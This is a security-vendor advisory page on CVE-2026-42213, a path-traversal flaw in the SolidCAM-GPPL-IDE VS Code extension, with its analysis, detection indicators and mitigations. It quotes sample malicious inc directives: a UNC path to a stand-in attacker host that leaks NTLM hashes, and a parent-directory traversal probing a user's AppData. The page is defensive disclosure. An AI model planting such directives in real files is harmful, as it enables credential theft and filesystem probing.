A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Six years. Gartner® Magic Quadrant™ Leader.Find Out Why
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-42213

CVE-2026-42213: SolidCAM-GPPL-IDE Info Disclosure Bug

CVE-2026-42213 is an information disclosure vulnerability in SolidCAM-GPPL-IDE that enables file probing and NTLM hash leaks through malicious path handling. This article covers technical details, affected versions, and fixes.

Published: May 18, 2026

CVE-2026-42213 Overview

CVE-2026-42213 affects SolidCAM-GPPL-IDE, an unofficial, independently developed Visual Studio Code extension that provides a Postprocessor IDE for SolidCAM. The vulnerability exists in the GpplDocumentLinkHandler component, which resolves the inc "filename" directive in GPPL postprocessor files into clickable document links. The handler accepts arbitrary paths, including absolute paths, parent-directory traversal sequences (..\..\..\), Universal Naming Convention (UNC) paths (\\server\share\), and arbitrary subfolders. Affected versions span from 1.0.0 to before 1.0.2. The flaw is classified under CWE-22: Improper Limitation of a Pathname to a Restricted Directory.

Critical Impact

A crafted GPPL postprocessor file can probe arbitrary local filesystem paths and trigger outbound Server Message Block (SMB) authentication, leaking NTLM hashes to attacker-controlled servers.

Affected Products

  • SolidCAM-GPPL-IDE versions 1.0.0 through 1.0.1
  • Visual Studio Code environments with the vulnerable extension installed
  • Windows hosts processing untrusted GPPL postprocessor files

Discovery Timeline

  • 2026-05-08 - CVE-2026-42213 published to the National Vulnerability Database (NVD)
  • 2026-05-12 - Last updated in NVD database

Technical Details for CVE-2026-42213

Vulnerability Analysis

The SolidCAM-GPPL-IDE extension implements a textDocument/documentLink provider that scans GPPL postprocessor files for inc "filename" directives. For each directive, GpplDocumentLinkHandler constructs a candidate path and calls File.Exists to determine whether to render a clickable link in the editor.

The handler performs no validation of the supplied filename. Attackers can embed absolute paths, relative paths containing parent-directory segments, or UNC paths pointing to remote SMB shares. Two distinct attack surfaces emerge from this design.

First, the File.Exists probing primitive enables information disclosure. An attacker can enumerate files and directories on the victim's filesystem by observing which links render as active versus broken in the editor view.

Second, UNC path resolution triggers SMB authentication. When the operating system attempts to satisfy File.Exists("\\\\attacker.tld\\share\\probe"), Windows automatically negotiates authentication and transmits the user's NTLMv2 challenge-response hash to the remote server.

Root Cause

The root cause is missing input sanitization on the filename argument of the inc directive. The handler treats user-controlled content from a project file as a trusted path and delegates resolution directly to the .NET framework without normalizing or restricting the path scope to the workspace root.

Attack Vector

Exploitation requires the victim to open a malicious .gpp file in Visual Studio Code with the SolidCAM-GPPL-IDE extension installed. The malicious file contains crafted inc directives such as inc "\\attacker.example.com\share\x" for NTLM relay or inc "..\..\..\Users\victim\AppData\Roaming\target.dat" for file existence probing. No further user interaction beyond opening the file is required for the document link handler to execute. Captured NTLM hashes can be relayed against domain services or subjected to offline cracking.

No verified exploit code is published. See the GitHub Security Advisory GHSA-xvpx-9p39-g62m for technical details.

Detection Methods for CVE-2026-42213

Indicators of Compromise

  • Outbound SMB (TCP/445) or NetBIOS (TCP/139) connections from Code.exe or extension host processes to untrusted external hosts
  • GPPL files containing inc directives with UNC prefixes (\\), drive letters, or ..\ sequences
  • Unexpected file access attempts originating from the Visual Studio Code extension host targeting sensitive paths such as AppData, System32, or user profile directories

Detection Strategies

  • Inspect .gpp and related postprocessor files in source repositories for inc directives referencing paths outside the project workspace
  • Alert on Visual Studio Code processes initiating SMB authentication to non-corporate IP ranges
  • Hunt for the SolidCAM-GPPL-IDE extension at versions below 1.0.2 across managed Windows endpoints

Monitoring Recommendations

  • Enable Windows Security event ID 4624/4625 logging to capture NTLM authentication attempts from developer workstations
  • Monitor egress firewall logs for outbound TCP/445 traffic, which should generally be blocked at the perimeter
  • Track endpoint telemetry for File.Exists style probing patterns from editor processes against sensitive directories

How to Mitigate CVE-2026-42213

Immediate Actions Required

  • Upgrade SolidCAM-GPPL-IDE to version 1.0.2 or later on all developer endpoints
  • Block outbound SMB traffic (TCP/445 and TCP/139) at the network perimeter to prevent NTLM hash exfiltration
  • Audit existing GPPL postprocessor files for malicious inc directives before opening them in the editor

Patch Information

The vulnerability is patched in SolidCAM-GPPL-IDE version 1.0.2. The fix is published in GitHub Release v1.0.2 and implemented in commit 9d0ba80. The patched handler restricts path resolution and rejects UNC and parent-directory traversal sequences.

Workarounds

  • Uninstall or disable the SolidCAM-GPPL-IDE extension until the upgrade to 1.0.2 is applied
  • Configure Windows Group Policy to restrict outgoing NTLM authentication to remote servers via the Network security: Restrict NTLM policies
  • Open untrusted GPPL files only in sandboxed virtual machines isolated from corporate networks and credentials
bash
# Configuration example - restrict outbound SMB and NTLM
# Block outbound SMB at Windows Firewall
New-NetFirewallRule -DisplayName "Block Outbound SMB" -Direction Outbound -Protocol TCP -RemotePort 445,139 -Action Block

# Restrict outgoing NTLM authentication (Group Policy)
# Computer Configuration > Windows Settings > Security Settings >
#   Local Policies > Security Options >
#   "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = Deny all

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeInformation Disclosure

  • Vendor/TechSolidcam

  • SeverityMEDIUM

  • CVSS Score5.1

  • EPSS Probability0.07%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityNone
  • CWE References
  • CWE-22
  • Technical References
  • GitHub Commit Update

  • GitHub Release v1.0.2

  • GitHub Security Advisory GHSA-xvpx-9p39-g62m
  • Related CVEs
  • CVE-2026-42212: SolidCAM-GPPL-IDE XXE Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English